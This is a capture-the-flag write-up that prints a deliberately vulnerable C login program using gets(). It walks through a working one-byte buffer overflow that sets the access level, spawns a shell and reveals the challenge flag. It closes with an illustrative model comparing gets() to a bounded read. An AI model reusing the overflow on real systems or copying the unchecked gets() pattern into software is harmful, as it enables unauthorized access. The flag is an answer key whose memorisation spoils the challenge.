Here's the VR gear admin console. See if you can figure out a way to log in. The problem is found here: /problems/51645e84d55d376442beaf264e0908b9
What happens if you read in more characters than the length of the username buffer? You should look at an ascii table to see what character you need to choose. Numbers are stored in little-endian format, which means that the lowest byte of the number is first. "cat file - | vrgearconsole " will keep the pipe open for commands.
So here comes the last challenge of Binary exploitation of Level 2. Let's go to dir: /problems/51645e84d55d376442beaf264e0908b9
So, we got 3 files in the directory.

    $ ls
    flag.txt vrgearconsole vrgearconsole.c
Let's check what is written in the vrgearconsole.c file.

    $ cat vrgearconsole.c
    #include <stdlib.h>
    #include <stdio.h>

    int login() {
        int accessLevel = 0xff;
        char username[16];
        char password[32];
        printf("Username (max 15 characters): ");
        gets(username);
        printf("Password (max 31 characters): ");
        gets(password);

        if (!strcmp(username, "admin") && !strcmp(password, "{{ create_long_password() }}")) {
            accessLevel = 2;
        } else if (!strcmp(username, "root") && !strcmp(password, "{{ create_long_password() }}")) {
            accessLevel = 0;
        } else if (!strcmp(username, "artist") && !strcmp(password, "my-password-is-secret")) {
            accessLevel = 0x80;
        }

        return accessLevel;
    }

    int main(int argc, char **argv) {
        setbuf(stdout, NULL);
        printf(
            "+----------------------------------------+\n"
            "|                                        |\n"
            "|                                        |\n"
            "|                                        |\n"
            "|                                        |\n"
            "|  Welcome to the VR gear admin console  |\n"
            "|                                        |\n"
            "|                                        |\n"
            "|                                        |\n"
            "|                                        |\n"
            "+----------------------------------------+\n"
            "|                                        |\n"
            "|     Your account is not recognized     |\n"
            "|                                        |\n"
            "+----------------------------------------+\n"
            "\n\n\n\n"
            "Please login to continue...\n\n\n"
        );
        int access = login();

        printf("Your access level is: 0x%08x\n", access);
        if (access >= 0xff || access <= 0) {
            printf("Login unsuccessful.\n");
            exit(10);
        } else if (access < 0x30) {
            printf("Admin access granted!\n");
            printf("The flag is in \"flag.txt\".\n");
            system("/bin/sh");
        } else {
            printf("Login successful.\n");
            /* The rest of this message is cut off in the listing. */
            printf("You do not have permission to access thi");
            exit(1);
        }
    }
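Now, as you can see:

    int accessLevel = 0xff;
    char username[16];
    char password[32];

0xff is 255. The username buffer holds 16 characters, and gets() does not check how much it reads. So what if we give 1 more character? As the output further down shows, the extra byte lands in the lowest byte of accessLevel (numbers are stored little-endian, as the hint says), so maybe with the grace of god we will get something good.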
Let's try it out:

    $ spirit="spiritedwolflove"
    $ echo -n $spirit | wc -c
    16

Now if we enter ! (0x21 in the ASCII table, which is below the 0x30 that main() checks for admin access) after love, it will look like this:

    spiritedwolflove!
Let's echo it out into a file named spirit. In the current folder we don't have permission to write, so we will write in the ~ home directory.

    $ echo "spiritedwolflove!" > ~/spirit
Now use cat + pipe + netcat:

    $ cat ~/spirit - | ./vrgearconsole
    +----------------------------------------+
    |                                        |
    |                                        |
    |                                        |
    |                                        |
    |  Welcome to the VR gear admin console  |
    |                                        |
    |                                        |
    |                                        |
    |                                        |
    +----------------------------------------+
    |                                        |
    |     Your account is not recognized     |
    |                                        |
    +----------------------------------------+

    Please login to continue...

    Username (max 15 characters): Password (max 31 characters):    --> Here press enter
    Your access level is: 0x00000021
    Admin access granted!
    The flag is in "flag.txt".
    ~ls
    flag.txt vrgearconsole vrgearconsole.c
    ~cat flag.txt
    8b7ea70220f19ab662750a8710a552c4
So, I think we got the flag: 8b7ea70220f19ab662750a8710a552c4
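Why the access level came out as 0x00000021, as an added example that is not part of the original write-up or the challenge source: it models the frame as username[16] followed directly by a little-endian accessLevel (an assumption that matches the output above) and compares the unchecked copy that gets() performs with a bounded read. The function names are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define NAME_LEN 16
#define FRAME_LEN (NAME_LEN + 4)   /* username[16] followed by a 4-byte accessLevel */

/* Read the modelled accessLevel as a little-endian 32-bit value. */
static uint32_t frame_level(const unsigned char *f) {
    return (uint32_t)f[NAME_LEN] | (uint32_t)f[NAME_LEN + 1] << 8 |
           (uint32_t)f[NAME_LEN + 2] << 16 | (uint32_t)f[NAME_LEN + 3] << 24;
}

static void frame_init(unsigned char *f) {
    memset(f, 0, FRAME_LEN);
    f[NAME_LEN] = 0xff;            /* accessLevel = 0xff, lowest byte first */
}

/* What gets(username) does: copy the line plus its NUL with no length check.
   The copy is clamped to the model frame so this demo itself stays in bounds. */
uint32_t level_after_gets(const char *line) {
    unsigned char f[FRAME_LEN];
    size_t n = strlen(line) + 1;
    frame_init(f);
    memcpy(f, line, n > FRAME_LEN ? FRAME_LEN : n);
    return frame_level(f);
}

/* Bounded replacement: a line that does not fit in username[16] is rejected. */
uint32_t level_after_bounded_read(const char *line) {
    unsigned char f[FRAME_LEN];
    size_t n = strlen(line) + 1;
    frame_init(f);
    if (n <= NAME_LEN)
        memcpy(f, line, n);
    return frame_level(f);
}

/* Same decision main() makes: 0 = login unsuccessful, 1 = admin, 2 = normal user. */
int classify(uint32_t access) {
    int a = (int)access;
    if (a >= 0xff || a <= 0) return 0;
    return a < 0x30 ? 1 : 2;
}

int main(void) {
    const char *in = "spiritedwolflove!";   /* the input used in the write-up */
    printf("gets:    0x%08x\n", (unsigned)level_after_gets(in));
    printf("bounded: 0x%08x\n", (unsigned)level_after_bounded_read(in));
}
```

With exactly 16 characters the only byte written past the buffer is the terminating NUL, which turns 0xff into 0 and still fails the login check; the 17th character is what sets the low byte.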
Hope you liked it :)
~Thanks